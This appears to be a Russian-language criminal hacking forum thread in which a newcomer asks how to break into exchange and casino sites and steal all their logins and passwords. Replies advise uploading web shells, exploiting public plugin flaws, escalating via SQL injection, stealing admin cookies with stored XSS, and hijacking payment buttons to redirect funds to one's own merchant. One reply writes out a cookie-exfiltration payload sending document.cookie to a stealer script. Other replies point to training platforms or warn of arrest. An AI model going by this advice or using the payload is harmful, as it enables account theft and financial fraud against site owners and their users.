• XSS.stack #1 – первый литературный журнал от юзеров форума

Возможно ли получить доступ к сайту (защищённому) и взять от туда все логины и пароли?

Отслеживать
zero_s1n

zero_s1n

CD-диск
Пользователь
Регистрация
25.02.2024
Сообщения
11
Реакции
0
я какой день изучаю всякие утилиты, nmap, sql, hydra,hadcat, и т.д., но я не как не могу взломать сайт, я пытался ломануть биржу, казино сайты и т.д., может кто-то может поделиться опытом и рассказать по больше?
 
Сортировать по дате Сортировать по голосам
А ты попробуй в начале взломать сайт пентагона так сказать потренируйся а потом уже пробуй биржу и казино сайты.
 
За 0 Против
Есть курсы пентестинга бесплатные и паблик системы для тестирования на проникновение(тренажеры).
Не заходят бесплатные, запишись на платные, еще и корочку получишь :)
А на шару кто с тобой будет заниматься? Есть поинтересней дела.
 
За 0 Против
Если даже сайт ломанешь, логины и пароли зашифрованы md5 или md5+salt, очень редко база не зашифрована. Обычно такие сайты используют для чего-то, распространения малвари, майнинг , фишинг или эксплуатация 0-day. Мы раньше переделывали API платежки на свой мерчант, что никому не советую. Даже с помощью хранимой XSS можно изменить поведения кнопки оплаты с редиктом на твой мерчант. Тебе стоит научиться заливать на сайты шеллкоды, чтобы иметь почти полный доступ к файловой системе. Можешь попробовать поискать публичные уязвимости для платформ или плагинов и пытаться использовать.
Само распространение способы как раз , поиск уязвимых плагинов, расширений, платформ, потом SQL и XSS. Через XSS украсть куки у админа и что нибудь сделать.
 
За 0 Против
zero_s1n сказал(а):
я какой день изучаю всякие утилиты, nmap, sql, hydra,hadcat, и т.д., но я не как не могу взломать сайт, я пытался ломануть биржу, казино сайты и т.д., может кто-то может поделиться опытом и рассказать по больше?
и мне тоэе это интересует
ты нашёл что нибудь для изучение?
если да, поделись со мной
 
За 0 Против
UnixSoft сказал(а):
Если даже сайт ломанешь, логины и пароли зашифрованы md5 или md5+salt, очень редко база не зашифрована. Обычно такие сайты используют для чего-то, распространения малвари, майнинг , фишинг или эксплуатация 0-day. Мы раньше переделывали API платежки на свой мерчант, что никому не советую. Даже с помощью хранимой XSS можно изменить поведения кнопки оплаты с редиктом на твой мерчант. Тебе стоит научиться заливать на сайты шеллкоды, чтобы иметь почти полный доступ к файловой системе. Можешь попробовать поискать публичные уязвимости для платформ или плагинов и пытаться использовать.
Само распространение способы как раз , поиск уязвимых плагинов, расширений, платформ, потом SQL и XSS. Через XSS украсть куки у админа и что нибудь сделать.
более подробно как с помощью xss красть куки, юзеры-пассы, редиректить пользователя? про скули кучу всего расписано, уже надоело их ковырять. хочется левел-ап. не знаешь где почитать про эксплуатицю xss на реальных таргетах?
 
За 0 Против
kosh_e4ka сказал(а):
более подробно как с помощью xss красть куки, юзеры-пассы, редиректить пользователя? про скули кучу всего расписано, уже надоело их ковырять. хочется левел-ап. не знаешь где почитать про эксплуатицю xss на реальных таргетах?
В сети есть полно мануалов на эту темы, базовое обучение сможешь найти легко, что такое хранимая XSS, отраженная и DOM. Когда надо углубиться идешь читать Habr там находят не стандартные методы внедрения. На нашем форуме вот есть интересная тема https://xss.pro/threads/105098/
Полезно еще иногда находить рапорты с HackerOne можно чему то научиться.
Коротко о XSS это когда мы можем выполнить Javascript код на сайте. Банально форма поиска на сайте для отраженной и поле комментарии для хранимой.
Смотри можно еще сделать так, если получилось внедрить SQL Injection, попробуй на сайте поднять привилегии для своего пользователя, до статуса админа, тогда будет возможность редактирования сайта и можно внедрить куда нибудь JS код и уже делать много не хороших вещей. ( Это если шелл залить не получилось)
Куки крадут с помощью сниффера , да можно на сниффер отправить что угодно если позволит сайт от куков, JWT сессии, пароли пользователя. Ну вот пример window.location="http://localhost/mutillidae/stealer.php?c="+document.cookie вернет нам куки на сниффер. Сниффер пишется на PHP и их полно в сети, надо только сервер поднять.
Потренироваться можно на этом сайте

У этого примера нету куков, можно их создать самому и их потом украсть на сниффер.
Без базового понимания JS красть юзер пассы или делать редиректы на правильные классы, не получиться. Я так случайно сломал пару сайтов когда внедрял слушатель на классы, не правильно вставлял JS, можно не в том месте закрыть код и часть кода не обработается на сайте.
Если ты умеешь работать со SQL значит есть понимание, этого языка. С XSS также надо понимать JS и HTML.
 
Последнее редактирование:
За 0 Против
UnixSoft сказал(а):
В сети есть полно мануалов на эту темы, базовое обучение сможешь найти легко, что такое хранимая XSS, отраженная и DOM. Когда надо углубиться идешь читать Habr там находят не стандартные методы внедрения. На нашем форуме вот есть интересная тема https://xss.pro/threads/105098/
Полезно еще иногда находить рапорты с HackerOne можно чему то научиться.
Коротко о XSS это когда мы можем выполнить Javascript код на сайте. Банально форма поиска на сайте для отраженной и поле комментарии для хранимой.
Смотри можно еще сделать так, если получилось внедрить SQL Injection, попробуй на сайте поднять привилегии для своего пользователя, до статуса админа, тогда будет возможность редактирования сайта и можно внедрить куда нибудь JS код и уже делать много не хороших вещей. ( Это если шелл залить не получилось)
Куки крадут с помощью сниффера , да можно на сниффер отправить что угодно если позволит сайт от куков, JWT сессии, пароли пользователя. Ну вот пример window.location="http://localhost/mutillidae/stealer.php?c="+document.cookie вернет нам куки на сниффер. Сниффер пишется на PHP и их полно в сети, надо только сервер поднять.
Потренироваться можно на этом сайте
Скрытое содержимое
У этого примера нету куков, можно их создать самому и их потом украсть на сниффер.
Без базового понимания JS красть юзер пассы или делать редиректы на правильные классы, не получиться. Я так случайно сломал пару сайтов когда внедрял слушатель на классы, не правильно вставлял JS, можно не в том месте закрыть код и часть кода не обработается на сайте.
Если ты умеешь работать со SQL значит есть понимание, этого языка. С XSS также надо понимать JS и HTML.
Святой ты человек. Большое спасибо. Да, в sql есть понимание, что такое XSS я знаю. Интересно было видеть примеры на реальных таргетах, идея с хакерваном хороша. Большое спаисбо, я бы поставил реакцию, но лимит :)
 
За 0 Против
zero_s1n сказал(а):
я какой день изучаю всякие утилиты, nmap, sql, hydra,hadcat, и т.д., но я не как не могу взломать сайт, я пытался ломануть биржу, казино сайты и т.д., может кто-то может поделиться опытом и рассказать по больше?
Тебе бы на трайхакми посидеть пока))

А если серьезно - твой вопрос звучит примерно как:
"У меня чет стучит в подвеске справа снизу. Я умею пользоваться отвёрткой и ключом на 12. Как чинить?"
 
За 0 Против
zero_s1n сказал(а):
я какой день изучаю всякие утилиты, nmap, sql, hydra,hadcat, и т.д., но я не как не могу взломать сайт, я пытался ломануть биржу, казино сайты и т.д., может кто-то может поделиться опытом и рассказать по больше?
ну вообщем смотри:
1-нашёл уязвимость
2-проэксплуатировал
3-деньги себе на кошелек скинул
пошёл гулять :cool:

И про метасплойт еще почитай на досуге
 
За 0 Против
zero_s1n сказал(а):
я какой день изучаю всякие утилиты, nmap, sql, hydra,hadcat, и т.д., но я не как не могу взломать сайт, я пытался ломануть биржу, казино сайты и т.д., может кто-то может поделиться опытом и рассказать по больше?
Чтобы нормально в тему пентеста зайти нужно практиковаться 24*7 полгода минимум. Чтобы стать профи не меньше трех лет. И порог входа постоянно растет. Как вариант изучай нейросети и автоматизацию. Это хороший инструмент. Есть большая вероятность, что ручного пентеста через пару лет не будет совсем.
 
За 1 Против
grandir сказал(а):
Чтобы нормально в тему пентеста зайти нужно практиковаться 24*7 полгода минимум. Чтобы стать профи не меньше трех лет. И порог входа постоянно растет. Как вариант изучай нейросети и автоматизацию. Это хороший инструмент. Есть большая вероятность, что ручного пентеста через пару лет не будет совсем.
нужен твой совет и ресурсы
порекомендуй ресурс/книжки/курсы
спасибо
 
За 0 Против
SatoshiX сказал(а):
нужен твой совет
Можешь мой взять
tryhackme
HackTheBox Academy

Канал John Hammond на ютубе.
Слитые курсы по питону, ради переделки PoC сплойтов в боевое состояние
 
За 0 Против
Надо ответить сначала себе на вопрос, а нах@я ?
Взломал ты сайт и дальше что, написать на главной страницы "Hacked by Vasya Petichkin" потом идти в школу и все хвататься что я ломанул форум беременных собак породы шпиц.
Выработаешь один алгоритм взлома, взломаешь один, второй третий потом десятый форум. А на утро придет майор Доигралесс со своим парадом, а на ПК твоем конечно все открыто и сохранено никаких шифровальщиков, никаких даже дырявых носков ты не юзал. А когда твой срок подойдет к концу, работать уже в нормальной компании нельзя, придется опять лезть в Undregroung.
Из твоего сообщения пытался взломать биржу или казино, ясно видно что хочется денег оттуда урвать, если хочется оттуда денег надо собирать команду или думаешь все буду лить на карту своего друга и потом снимем в банкомате.
 
За 0 Против
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх